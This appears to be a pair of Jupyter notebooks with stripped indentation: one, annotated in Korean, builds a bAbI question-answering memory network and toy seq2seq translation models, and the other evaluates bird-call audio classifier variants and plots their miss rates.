pred_results = model.predict(([my_story,my_ques]))
val_max = np.argmax(pred_results[0])
print(pred_results[0][val_max])
# 맟출 확률이 1/38
# 50 에서는 0.579
# 100 dptj 0.69
# 150 에서 0.54
#These are the probabilities for the vocab words using the 1st sentence
pred_results[0]
val_max = np.argmax(pred_results[0])
for key,val in tokenizer.word_index.items():
if val == val_max:
k = key
print(k)
#See probability:
pred_results[0][val_max]
```
# ================================
```
#Now, we can make our own questions using the vocabulary we have
print( len(vocab) )
vocab
# 'office': 1
# '?': 37 == 마지막 index
my_story = 'Sandra picked up the milk . Mary travelled left . '
my_story.split()
```
my_story = 'Sandra picked up the milk . Mary travelled left . '
my_question = 'Sandra got the milk ?'
my_data = [(my_story.split(), my_question.split(),'yes')]
my_story, my_ques, my_ans = vectorize_stories(my_data)
pred_results = model.predict(([my_story,my_ques]))
val_max = np.argmax(pred_results[0])
print(pred_results[0][val_max])
```
my_question = 'Sandra got the milk ?'
my_question.split()
#Put the data in the same format as before
my_data = [(my_story.split(), my_question.split(),'yes')]
#Vectorize this data
my_story, my_ques, my_ans = vectorize_stories(my_data)
#Make the prediction
pred_results = model.predict(([my_story,my_ques]))
print( pred_results.shape )
print( 'yes : ', pred_results[0][26] )
print( 'no : ', pred_results[0][37] )
print( pred_results[0][26]/ pred_results[0][37] )
# 50 일때 yes / no = 0.986 거의 같은 확률 0
```
'yes': 24,
'left': 25,
'to': 26,
'milk': 27,
'in': 28,
'moved': 29,
'discarded': 30,
'no': 31,
```
val_max = np.argmax(pred_results[0])
print( val_max )
#Correct prediction!
for key,val in tokenizer.word_index.items():
if val == val_max:
k = key
print(val)
print(k)
#Confidence
pred_results[0][val_max]
```
# ====================================
```
my_story = 'Sandra picked up the milk . Sandra moved to the bathroom . '
my_question = 'Is the milk in the bathroom ?'
my_data = [(my_story.split(), my_question.split(),'yes')]
my_story, my_ques, my_ans = vectorize_stories(my_data)
pred_results = model.predict(([my_story,my_ques]))
val_max = np.argmax(pred_results[0])
print(pred_results[0][val_max])
###############################
# 50 에서는 0.9748
# 100 에서는 0.974858
# 150 에서 0.6165
model.evaluate([inputs_train,questions_train],answers_train,
batch_size = 32)
val_max = np.argmax(pred_results[0])
print( val_max )
#Correct prediction!
for key,val in tokenizer.word_index.items():
if val == val_max:
k = key
print(val)
print(k)
```
# ====================================
<p>
한 장에 모아쓴 코드
```
import keras
from keras.models import Sequential, Model
from keras.layers.embeddings import Embedding
from keras.layers import Permute, dot, add, concatenate
from keras.layers import LSTM, Dense, Dropout, Input, Activation
from keras.utils.data_utils import get_file
from keras.preprocessing.sequence import pad_sequences
from functools import reduce
import tarfile
import numpy as np
import re
import IPython
import matplotlib.pyplot as plt
import pandas as pd
%matplotlib inline
def tokenize(sent):
return [ x.strip() for x in re.split('(\W+)+', sent) if x.strip()]
def parse_stories(lines):
'''Parse stories provided in the bAbi tasks format
'''
data = []
story = []
for line in lines:
line = line.decode('utf-8').strip()
nid, line = line.split(' ', 1)
nid = int(nid)
if nid == 1:
story = []
if '\t' in line:
q, a, supporting = line.split('\t')
q = tokenize(q)
# Provide all the substories
substory = [x for x in story if x]
data.append((substory, q, a))
story.append('')
else:
sent = tokenize(line)
story.append(sent)
return data
def get_stories(f):
data = parse_stories(f.readlines())
flatten = lambda data: reduce(lambda x, y: x + y, data)
data = [(flatten(story), q, answer) for story, q, answer in data]
return data
def vectorize_stories(data, word_idx, story_maxlen, query_maxlen):
X = []
Xq = []
Y = []
for story, query, answer in data:
x = [word_idx[w] for w in story]
xq = [word_idx[w] for w in query]
# let's not forget that index 0 is reserved
y = np.zeros(len(word_idx) + 1)
y[word_idx[answer]] = 1
X.append(x)
Xq.append(xq)
Y.append(y)
return (pad_sequences(X, maxlen=story_maxlen),
pad_sequences(Xq, maxlen=query_maxlen), np.array(Y))
class TrainingVisualizer(keras.callbacks.History):
def on_epoch_end(self, epoch, logs={}):
super().on_epoch_end(epoch, logs)
IPython.display.clear_output(wait=True)
pd.DataFrame({key: value for key, value in self.history.items() if key.endswith('loss')}).plot()
axes = pd.DataFrame({key: value for key, value in self.history.items() if key.endswith('acc')}).plot()
axes.set_ylim([0, 1])
plt.show()
try:
path = get_file('babi-tasks-v1-2.tar.gz', origin='https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz')
except:
print('Error downloading dataset, please download it manually:\n'
'$ wget http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz\n'
'$ mv tasks_1-20_v1-2.tar.gz ~/.keras/datasets/babi-tasks-v1-2.tar.gz')
raise
tar = tarfile.open(path)
challenge = 'tasks_1-20_v1-2/en-10k/qa1_single-supporting-fact_{}.txt'
print('Extracting stories for the challenge: single_supporting_fact_10k')
train_stories = get_stories(tar.extractfile(challenge.format('train')))
test_stories = get_stories(tar.extractfile(challenge.format('test')))
print( len(train_stories), len(test_stories) )
print('Number of training stories:', len(train_stories))
print('Number of test stories:', len(test_stories))
print( train_stories[0] )
vocab = set()
for story, q, answer in train_stories + test_stories:
vocab |= set(story + q + [answer])
vocab = sorted(vocab)
# Reserve 0 for masking via pad_sequences
vocab_size = len(vocab) + 1
story_maxlen = max(map(len, (x for x, _, _ in train_stories + test_stories)))
query_maxlen = max(map(len, (x for _, x, _ in train_stories + test_stories)))
word_idx = dict((c, i + 1) for i, c in enumerate(vocab))
idx_word = dict((i+1, c) for i,c in enumerate(vocab))
inputs_train, queries_train, answers_train = vectorize_stories(train_stories,
word_idx,
story_maxlen,
query_maxlen)
inputs_test, queries_test, answers_test = vectorize_stories(test_stories,
word_idx,
story_maxlen,
print('-------------------------')
print('Vocabulary:\n',vocab,"\n")
print('Vocab size:', vocab_size, 'unique words')
print('Story max length:', story_maxlen, 'words')
print('Query max length:', query_maxlen, 'words')
print('Number of training stories:', len(train_stories))
print('Number of test stories:', len(test_stories))
print('-------------------------')
print('-------------------------')
print('inputs: integer tensor of shape (samples, max_length)')
print('inputs_train shape:', inputs_train.shape)
print('inputs_test shape:', inputs_test.shape)
print('input train sample', inputs_train[0,:])
print('-------------------------')
print('-------------------------')
print('queries: integer tensor of shape (samples, max_length)')
print('queries_train shape:', queries_train.shape)
print('queries_test shape:', queries_test.shape)
print('query train sample', queries_train[0,:])
print('-------------------------')
print('answers: binary (1 or 0) tensor of shape (samples, vocab_size)')
print('answers_train shape:', answers_train.shape)
print('answers_test shape:', answers_test.shape)
print('answer train sample', answers_train[0,:])
print('-------------------------')
train_epochs = 100
batch_size = 32
lstm_size = 64
embed_size = 50
dropout_rate = 0.3
# placeholders
input_sequence = Input((story_maxlen,))
question = Input((query_maxlen,))
print('Input sequence:', input_sequence)
print('Question:', question)
# encoders
# embed the input sequence into a sequence of vectors
input_encoder_m = Sequential()
input_encoder_m.add(Embedding(input_dim=vocab_size,
output_dim=embed_size))
input_encoder_m.add(Dropout(dropout_rate))
# output: (samples, story_maxlen, embedding_dim)
# embed the input into a sequence of vectors of size query_maxlen
input_encoder_c = Sequential()
input_encoder_c.add(Embedding(input_dim=vocab_size,
output_dim=query_maxlen))
input_encoder_c.add(Dropout(dropout_rate))
# output: (samples, story_maxlen, query_maxlen)
# embed the question into a sequence of vectors
question_encoder = Sequential()
question_encoder.add(Embedding(input_dim=vocab_size,
output_dim=embed_size,
input_length=query_maxlen))
question_encoder.add(Dropout(dropout_rate))
# output: (samples, query_maxlen, embedding_dim)
# encode input sequence and questions (which are indices)
# to sequences of dense vectors
input_encoded_m = input_encoder_m(input_sequence)
print('Input encoded m', input_encoded_m)
input_encoded_c = input_encoder_c(input_sequence)
print('Input encoded c', input_encoded_c)
question_encoded = question_encoder(question)
print('Question encoded', question_encoded)
# compute a 'match' between the first input vector sequence
# and the question vector sequence
# shape: `(samples, story_maxlen, query_maxlen)
match = dot([input_encoded_m, question_encoded], axes=-1, normalize=False)
print(match.shape)
match = Activation('softmax')(match)
print('Match shape', match.shape)
# add the match matrix with the second input vector sequence
response = add([match, input_encoded_c]) # (samples, story_maxlen, query_maxlen)
response = Permute((2, 1))(response) # (samples, query_maxlen, story_maxlen)
print('Response shape', response)
# concatenate the response vector with the question vector sequence
answer = concatenate([response, question_encoded])
print('Answer shape', answer)
answer = LSTM(lstm_size)(answer) # Generate tensors of shape 32
answer = Dropout(dropout_rate)(answer)
answer = Dense(vocab_size)(answer) # (samples, vocab_size)
# we output a probability distribution over the vocabulary
answer = Activation('softmax')(answer)
# build the final model
model = Model([input_sequence, question], answer)
model.compile(optimizer='rmsprop', loss='categorical_crossentropy',
metrics=['accuracy'])
model.summary()
model.fit([inputs_train, queries_train], answers_train, batch_size, train_epochs, callbacks=[TrainingVisualizer()],
validation_data=([inputs_test, queries_test], answers_test))
model.save('model.h5')
for i in range(0,10):
current_inp = test_stories[i]
current_story, current_query, current_answer = vectorize_stories([current_inp], word_idx, story_maxlen, query_maxlen)
current_prediction = model.predict([current_story, current_query])
current_prediction = idx_word[np.argmax(current_prediction)]
print(' '.join(current_inp[0]), ' '.join(current_inp[1]), '| Prediction:', current_prediction, '| Ground Truth:', current_inp[2])
print("-----------------------------------------------------------------------------------------")
# print('-------------------------------------------------------------------------------------------')
# print('Custom User Queries (Make sure there are spaces before each word)')
# while 1:
# print('-------------------------------------------------------------------------------------------')
# print('Please input a story')
# user_story_inp = input().split(' ')
# print('Please input a query')
# user_query_inp = input().split(' ')
# user_story, user_query, user_ans = vectorize_stories([[user_story_inp, user_query_inp, '.']], word_idx, story_maxlen, query_maxlen)
# user_prediction = model.predict([user_story, user_query])
# user_prediction = idx_word[np.argmax(user_prediction)]
# print('Result')
# print(' '.join(user_story_inp), ' '.join(user_query_inp), '| Prediction:', user_prediction)
# Mary went to the bathroom . John moved to the hallway . Mary travelled to the office . # Where is Mary ?
# Sandra travelled to the office . John journeyed to the garden .
```
# ====================================
<p>
# [생각] 영어 데이터를 한글 번역기로 번역을 시킨다.
<p>
# [생각] 한글용 Babi 데이터로 한글 QA 만들어본다.
<p>
# [생각] 수학학습 질문과 답변 데이터로 만들어본다.
<p>
# web 버젼, attention 버젼
# https://github.com/vinhkhuc/MemN2N-babi-python
# ++++++++++++++++++++++++++++++++++
<p>
# sequence 2 sequence 실험
<p>

```
import tensorflow.compat.v1 as tf
tf.disable_eager_execution()
import numpy as np
char_arr = [c for c in "SEPabcdefghijklmnopqrstuvwxyz단어나무놀이소녀키스사랑봉구우루"]
num_dic = {n: i for i, n in enumerate(char_arr)}
dic_len = len(num_dic)
seq_data = [['word', "단어"], ["wood", "나무"], ["game", "놀이"], ["girl", "소녀"],
["kiss", "키스"], ["love", "사랑"], ["bong", "봉구"], ["uruu", "우루"]]
def make_batch(seq_data):
input_batch = []
output_batch = []
target_batch = []
for seq in seq_data:
input = [num_dic[n] for n in seq[0]]
output = [num_dic[n] for n in ("S" + seq[1])]
target = [num_dic[n] for n in (seq[1] + "E")]
input_batch.append(np.eye(dic_len)[input])
output_batch.append(np.eye(dic_len)[output])
target_batch.append(target)
return input_batch, output_batch, target_batch
learning_rate = 0.001
n_hidden = 128
total_epoch = 1000
n_class = n_input = dic_len
enc_input = tf.placeholder(tf.float32, [None, None, n_input])
dec_input = tf.placeholder(tf.float32, [None, None, n_input])
targets = tf.placeholder(tf.int64, [None, None])
# encoder: [batch size, time steps, input size]
# decoder: [batch size, time steps]
with tf.variable_scope("encode"):
enc_cell = tf.nn.rnn_cell.BasicRNNCell(n_hidden)
enc_cell = tf.nn.rnn_cell.DropoutWrapper(enc_cell, output_keep_prob=0.5)
outputs, enc_states = tf.nn.dynamic_rnn(enc_cell, enc_input, dtype=tf.float32)
with tf.variable_scope("decode"):
dec_cell = tf.nn.rnn_cell.BasicRNNCell(n_hidden)
dec_cell = tf.nn.rnn_cell.DropoutWrapper(enc_cell, output_keep_prob=0.5)
outputs, dec_stats = tf.nn.dynamic_rnn(dec_cell, dec_input,
initial_state=enc_states, dtype=tf.float32)
model = tf.layers.dense(outputs, n_class, activation=None)
cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=model, labels=targets
)
)
opt = tf.train.AdamOptimizer(learning_rate).minimize(cost)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
input_batch, output_batch, target_batch = make_batch(seq_data)
cost_val = []
for epoch in range(total_epoch):
_, loss = sess.run([opt, cost], feed_dict={enc_input: input_batch,
dec_input: output_batch,
targets: target_batch})
cost_val.append(loss)
if (epoch+1) % 200 ==0:
print("Epoch: {:04d}, cost: {}".format(epoch+1, loss))
print("\noptimization complete")
import matplotlib.pyplot as plt
%matplotlib inline
plt.rcParams["axes.unicode_minus"] = False
plt.figure(figsize=(20, 10))
plt.title("cost")
plt.plot(cost_val, linewidth=1, alpha=0.8)
plt.show()
def translate(word):
seq_data = [word, "P" * len(word)]
input_batch, output_batch, target_batch = make_batch([seq_data])
prediction = tf.argmax(model, 2)
result = sess.run(prediction, feed_dict={enc_input: input_batch,
dec_input: output_batch,
targets: target_batch})
decoded = [char_arr[i] for i in result[0]]
try:
end = decoded.index("E")
translated = "".join(decoded[:end])
return translated
except Exception as ex:
pass
print("\n ==== translate test ====")
print("word -> {}".format(translate("word")))
print("wodr -> {}".format(translate("wodr")))
print("love -> {}".format(translate("love")))
print("loev -> {}".format(translate("loev")))
print("bogn -> {}".format(translate("bogn")))
print("uruu -> {}".format(translate("uruu")))
print("abcd -> {}".format(translate("abcd")))
```
# 자동 단어 완성 !! (3글자 ==> 4글자)

```
import tensorflow.compat.v1 as tf
import numpy as np
char_arr = ["a", "b", "c", "d", "e", "f", "g",
"h", "i", "j", "k", "l", "m", "n",
"o", "p", "q", "r", "s", "t", "u",
"v", "w", "x", "y", "z"]
num_dic = {n: i for i, n in enumerate(char_arr)}
dic_len = len(num_dic)
seq_data = ["word", "wood", "deep", "dive", "cold", "cool", "load", "love", "kiss", "kind"]
def make_batch(seq_data):
input_batch = []
target_batch = []
for seq in seq_data:
input = [num_dic[n] for n in seq[:-1]]
target = num_dic[seq[-1]]
input_batch.append(np.eye(dic_len)[input])
target_batch.append(target)
return input_batch, target_batch
learning_rate = 0.001
n_hidden = 128
total_epoch = 10000
n_step = 3
n_input = n_class = dic_len
X = tf.placeholder(tf.float32, [None, n_step, n_input], name="input_X")
Y = tf.placeholder(tf.int32, [None])
W = tf.Variable(tf.random_normal([n_hidden, n_class]))
b = tf.Variable(tf.random_normal([n_class]))
cell1 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden)
cell1 = tf.nn.rnn_cell.DropoutWrapper(cell1, output_keep_prob=0.5)
cell2 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden)
# MultiRNNCell 함수를 사용하여 조합
multi_cell = tf.nn.rnn_cell.MultiRNNCell([cell1, cell2])
outputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32)
outputs = tf.transpose(outputs, [1, 0, 2])
outputs = outputs[-1]
model = tf.matmul(outputs, W) + b
cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=model, labels=Y)
)
opt = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
input_batch, output_batch = make_batch(seq_data)
cost_epoch = []
for epoch in range(total_epoch):
_, loss = sess.run([opt, cost], feed_dict={X: input_batch, Y: output_batch})
cost_epoch.append(loss)
if (epoch+1) % 2000 ==0:
print("Epoch: {}, cost= {}".format(epoch+1, loss))
print("\noptimization complete")
import matplotlib.pyplot as plt
%matplotlib inline
plt.rcParams["axes.unicode_minus"] = False
plt.figure(figsize=(20,6))
plt.title("cost")
plt.plot(cost_epoch, linewidth=1)
plt.show()
prediction = tf.cast(tf.argmax(model, 1), tf.int32)
prediction_check = tf.equal(prediction, Y)
accuracy = tf.reduce_mean(tf.cast(prediction_check, tf.float32))
input_batch, target_batch = make_batch(seq_data)
predict, accuracy_val = sess.run([prediction, accuracy],
feed_dict={X: input_batch, Y: target_batch})
predict_word = []
for idx, val in enumerate(seq_data):
last_char = char_arr[predict[idx]]
predict_word.append(val[:3] + last_char)
print("\n==== prediction ====")
print("input_value: \t\t{}".format([w[:3] for w in seq_data]))
print("prediction_value: \t{}".format(predict_word))
print("accuracy: {:.3f}".format(accuracy_val))
```
# 4.ipynb 에서 attention 개념 위해 사용하는 toy 코드
<p>
# +++++++++++++++++++++++++++++++++++++++++++++++++++
<p>
### [과제] 실행시간이 오래 걸림 . 저장된 모델 불러오는 기능을 추가.
### [과제] 구글 번역기로 한글 charbot 데이터를 영어로 번역하고 탐구.
```
from __future__ import print_function
from keras.models import Model
from keras.layers import Input, LSTM, Dense
import numpy as np
batch_size = 64 # Batch size for training.
epochs = 3 # 100 # Number of epochs to train for.
latent_dim = 256 # Latent dimensionality of the encoding space.
num_samples = 10000 # Number of samples to train on.
# Path to the data txt file on disk.
data_path = 'data_nmt/data/kor.txt'
# Vectorize the data.
input_texts = []
target_texts = []
input_characters = set()
target_characters = set()
with open(data_path, 'r', encoding='utf-8') as f:
lines = f.read().split('\n')
for line in lines[: min(num_samples, len(lines) - 1)]:
input_text, target_text, rest = line.split('\t')
# We use "tab" as the "start sequence" character
# for the targets, and "\n" as "end sequence" character.
target_text = '\t' + target_text + '\n'
input_texts.append(input_text)
target_texts.append(target_text)
for char in input_text:
if char not in input_characters:
input_characters.add(char)
for char in target_text:
if char not in target_characters:
target_characters.add(char)
input_characters = sorted(list(input_characters))
target_characters = sorted(list(target_characters))
num_encoder_tokens = len(input_characters)
num_decoder_tokens = len(target_characters)
max_encoder_seq_length = max([len(txt) for txt in input_texts])
max_decoder_seq_length = max([len(txt) for txt in target_texts])
print('Number of samples:', len(input_texts))
print('Number of unique input tokens:', num_encoder_tokens)
print('Number of unique output tokens:', num_decoder_tokens)
print('Max sequence length for inputs:', max_encoder_seq_length)
print('Max sequence length for outputs:', max_decoder_seq_length)
input_token_index = dict(
[(char, i) for i, char in enumerate(input_characters)])
target_token_index = dict(
[(char, i) for i, char in enumerate(target_characters)])
encoder_input_data = np.zeros(
(len(input_texts), max_encoder_seq_length, num_encoder_tokens),
dtype='float32')
decoder_input_data = np.zeros(
(len(input_texts), max_decoder_seq_length, num_decoder_tokens),
dtype='float32')
decoder_target_data = np.zeros(
(len(input_texts), max_decoder_seq_length, num_decoder_tokens),
dtype='float32')
for i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)):
for t, char in enumerate(input_text):
encoder_input_data[i, t, input_token_index[char]] = 1.
encoder_input_data[i, t + 1:, input_token_index[' ']] = 1.
for t, char in enumerate(target_text):
# decoder_target_data is ahead of decoder_input_data by one timestep
decoder_input_data[i, t, target_token_index[char]] = 1.
if t > 0:
# decoder_target_data will be ahead by one timestep
# and will not include the start character.
decoder_target_data[i, t - 1, target_token_index[char]] = 1.
decoder_input_data[i, t + 1:, target_token_index[' ']] = 1.
decoder_target_data[i, t:, target_token_index[' ']] = 1.
# Define an input sequence and process it.
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
# We discard `encoder_outputs` and only keep the states.
encoder_states = [state_h, state_c]
# Set up the decoder, using `encoder_states` as initial state.
decoder_inputs = Input(shape=(None, num_decoder_tokens))
# We set up our decoder to return full output sequences,
# and to return internal states as well. We don't use the
# return states in the training model, but we will use them in inference.
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs,
initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation='softmax')
decoder_outputs = decoder_dense(decoder_outputs)
# Define the model that will turn
# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
# Run training
model.compile(optimizer='rmsprop', loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit([encoder_input_data, decoder_input_data], decoder_target_data,
batch_size=batch_size,
epochs=epochs,
validation_split=0.2)
# Save model
model.save('./data_nmt/data/s2s.h5')
# Next: inference mode (sampling).
# Here's the drill:
# 1) encode input and retrieve initial decoder state
# 2) run one step of decoder with this initial state
# and a "start of sequence" token as target.
# Output will be the next target token
# 3) Repeat with the current target token and current states
# Define sampling models
encoder_model = Model(encoder_inputs, encoder_states)
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
decoder_outputs, state_h, state_c = decoder_lstm(
decoder_inputs, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model(
[decoder_inputs] + decoder_states_inputs,
[decoder_outputs] + decoder_states)
# Reverse-lookup token index to decode sequences back to
# something readable.
reverse_input_char_index = dict(
(i, char) for char, i in input_token_index.items())
reverse_target_char_index = dict(
(i, char) for char, i in target_token_index.items())
def decode_sequence(input_seq):
# Encode the input as state vectors.
states_value = encoder_model.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1, 1, num_decoder_tokens))
# Populate the first character of target sequence with the start character.
target_seq[0, 0, target_token_index['\t']] = 1.
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sentence = ''
while not stop_condition:
output_tokens, h, c = decoder_model.predict(
[target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sentence += sampled_char
# Exit condition: either hit max length
# or find stop character.
if (sampled_char == '\n' or
len(decoded_sentence) > max_decoder_seq_length):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1, 1, num_decoder_tokens))
target_seq[0, 0, sampled_token_index] = 1.
# Update states
states_value = [h, c]
return decoded_sentence
for seq_index in range(100):
# Take one sequence (part of the training set)
# for trying out decoding.
input_seq = encoder_input_data[seq_index: seq_index + 1]
decoded_sentence = decode_sequence(input_seq)
print('-')
print('Input sentence:', input_texts[seq_index])
print('Decoded sentence:', decoded_sentence)
```
|
github_jupyter
|
```
import csv
import numpy as np
import os
import pandas as pd
import scipy.interpolate
import sklearn.metrics
import sys
sys.path.append("../src")
import localmodule
if sys.version_info[0] < 3:
from StringIO import StringIO
else:
from io import StringIO
from matplotlib import pyplot as plt
%matplotlib inline
# Define constants.
dataset_name = localmodule.get_dataset_name()
models_dir = localmodule.get_models_dir()
units = localmodule.get_units()
n_units = len(units)
n_trials = 10
import tqdm
model_names = [
"icassp-convnet", "icassp-convnet_aug-all-but-noise", "icassp-convnet_aug-all",
"pcen-convnet", "pcen-convnet_aug-all-but-noise", "pcen-convnet_aug-all",
"icassp-ntt-convnet", "icassp-ntt-convnet_aug-all-but-noise", "icassp-ntt-convnet_aug-all",
"pcen-ntt-convnet", "pcen-ntt-convnet_aug-all-but-noise", "pcen-ntt-convnet_aug-all",
"icassp-add-convnet", "icassp-add-convnet_aug-all-but-noise", "icassp-add-convnet_aug-all",
"pcen-add-convnet", "pcen-add-convnet_aug-all-but-noise", "pcen-add-convnet_aug-all",
]
n_models = len(model_names)
fold_accs = []
for fold_id in range(6):
model_accs = {}
for model_name in tqdm.tqdm(model_names):
val_accs = []
for trial_id in range(10):
model_dir = os.path.join(models_dir, model_name)
test_unit_str = units[fold_id]
test_unit_dir = os.path.join(model_dir, test_unit_str)
trial_str = "trial-" + str(trial_id)
trial_dir = os.path.join(test_unit_dir, trial_str)
val_unit_strs = localmodule.fold_units()[fold_id][2]
val_tn = 0
val_tp = 0
val_fn = 0
val_fp = 0
for val_unit_str in val_unit_strs:
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
trial_str,
"predict-" + val_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
# Load prediction.
try:
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_pred = (y_pred > 0.5).astype('int')
# Load ground truth.
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
tn, fp, fn, tp = sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
val_tn = val_tn + tn
val_fp = val_fp + fp
val_fn = val_fn + fn
val_tp = val_tp + tp
except:
val_tn = -np.inf
val_tp = -np.inf
val_fn = -np.inf
val_tp = -np.inf
if val_tn < 0:
val_acc = 0.0
else:
val_acc =\
100 * (val_tn+val_tp) /\
(val_tn+val_tp+val_fn+val_fp)
val_accs.append(val_acc)
# Remove the models that did not train (accuracy close to 50%, i.e. chance)
val_accs = [v for v in val_accs if v > 65.0]
model_accs[model_name] = val_accs
fold_accs.append(model_accs)
fold_accs
fold_id = 0
#model_accs = np.stack(list(fold_accs[fold_id].values()))[:,:]
#plt.boxplot(model_accs.T);
model_names = [
"icassp-convnet", "icassp-convnet_aug-all-but-noise", "icassp-convnet_aug-all",
"pcen-convnet", "pcen-convnet_aug-all-but-noise", "pcen-convnet_aug-all",
"icassp-ntt-convnet", "icassp-ntt-convnet_aug-all-but-noise", "icassp-ntt-convnet_aug-all",
"pcen-ntt-convnet", "pcen-ntt-convnet_aug-all-but-noise", "pcen-ntt-convnet_aug-all",
"icassp-add-convnet", "icassp-add-convnet_aug-all-but-noise", "icassp-add-convnet_aug-all",
"pcen-add-convnet", "pcen-add-convnet_aug-all-but-noise", "pcen-add-convnet_aug-all",
]
errs = 100 - np.stack([np.median(x) for x in list(fold_accs[fold_id].values())])
xmax = np.ceil(np.max(errs)) + 2.5
fig = plt.figure(figsize=(xmax/2, 4), frameon=False)
plt.plot(errs[0], [0], 'o', color='blue');
plt.plot(errs[1], [1], 'o', color='blue');
plt.plot(errs[2], [2], 'o', color='blue');
plt.plot(errs[3], [0], 'o', color='orange');
plt.plot(errs[4], [1], 'o', color='orange');
plt.plot(errs[5], [2], 'o', color='orange');
plt.text(-0.5, 1, 'no context\nadaptation',
horizontalalignment='center',
verticalalignment='center',
rotation=90, wrap=True)
#plt.text(max(errs[0], errs[3]) + 1, 0, 'none');
#plt.text(max(errs[1], errs[4]) + 1, 1, 'geometrical');
#plt.text(max(errs[2], errs[5]) + 1, 2, 'adaptive');
plt.plot(errs[6], [4], 'o', color='blue');
plt.plot(errs[7], [5], 'o', color='blue');
plt.plot(errs[8], [6], 'o', color='blue');
plt.plot(errs[9], [4], 'o', color='orange');
plt.plot(errs[10], [5], 'o', color='orange');
plt.plot(errs[11], [6], 'o', color='orange');
plt.text(-0.5, 5, 'mixture\nof experts',
horizontalalignment='center',
verticalalignment='center',
rotation=90, wrap=True)
#plt.text(max(errs[6], errs[9]) + 1, 4, 'none');
#plt.text(max(errs[7], errs[10]) + 1, 5, 'geometrical');
#plt.text(max(errs[8], errs[11]) + 1, 6, 'adaptive');
plt.plot(errs[12], [8], 'o', color='blue');
plt.plot(errs[13], [9], 'o', color='blue');
plt.plot(errs[14], [10], 'o', color='blue');
plt.plot(errs[15], [8], 'o', color='orange');
plt.plot(errs[16], [9], 'o', color='orange');
plt.plot(errs[17], [10], 'o', color='orange');
plt.text(-0.5, 9, 'adaptive\nthreshold',
horizontalalignment='center',
verticalalignment='center',
rotation=90, wrap=True)
#plt.text(max(errs[12], errs[15]) + 1, 8, 'none');
#plt.text(max(errs[13], errs[16]) + 1, 9, 'geometrical');
#plt.text(max(errs[14], errs[17]) + 1, 10, 'adaptive');
plt.plot([0, xmax], [3, 3], '--', color=[0.75, 0.75, 0.75], linewidth=1.0, alpha=0.5)
plt.plot([0, xmax], [7, 7], '--', color=[0.75, 0.75, 0.75], linewidth=1.0, alpha=0.5)
plt.xlim([0.0, xmax])
plt.ylim([10.5, -0.5])
ax = fig.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.get_yaxis().set_ticks([])
fig.gca().set_xticks(range(0, int(xmax)+1, 1));
fig.gca().xaxis.grid(linestyle='--', alpha=0.5)
plt.xlabel("Average miss rate (%)")
#plt.savefig("spl_bv-70k-benchmark_fold-" + units[fold_id] + ".eps")
model_names = [
# "icassp-convnet", "icassp-convnet_aug-all-but-noise",
# "icassp-ntt-convnet", "icassp-ntt-convnet_aug-all-but-noise",
# "icassp-add-convnet", "icassp-add-convnet_aug-all-but-noise",
# "pcen-convnet", "pcen-convnet_aug-all-but-noise",
# "pcen-ntt-convnet", "pcen-ntt-convnet_aug-all-but-noise",
# "pcen-add-convnet", "pcen-add-convnet_aug-all-but-noise",
]
model_names = [
"icassp-convnet", "icassp-ntt-convnet", "icassp-add-convnet",
"icassp-convnet_aug-all-but-noise", "icassp-ntt-convnet_aug-all-but-noise", "icassp-add-convnet_aug-all-but-noise",
"pcen-convnet", "pcen-ntt-convnet", "pcen-add-convnet",
"pcen-convnet_aug-all-but-noise", "pcen-ntt-convnet_aug-all-but-noise", "pcen-add-convnet_aug-all-but-noise"
]
plt.gca().invert_yaxis()
colors = [
"#CB0003", # RED
"#E67300", # ORANGE
"#990099", # PURPLE
"#0000B2", # BLUE
"#009900", # GREEN
# '#008888', # TURQUOISE
# '#888800', # KAKI
'#555555', # GREY
]
xticks = np.array([1.0, 1.5, 2, 2.5, 3, 4, 5, 6, 8, 10, 12, 16, 20])
#xticks = np.array(range(1, 20))
plt.xticks(np.log2(xticks))
xtick_strs = []
for xtick in xticks:
if np.abs(xtick - int(xtick)) == 0:
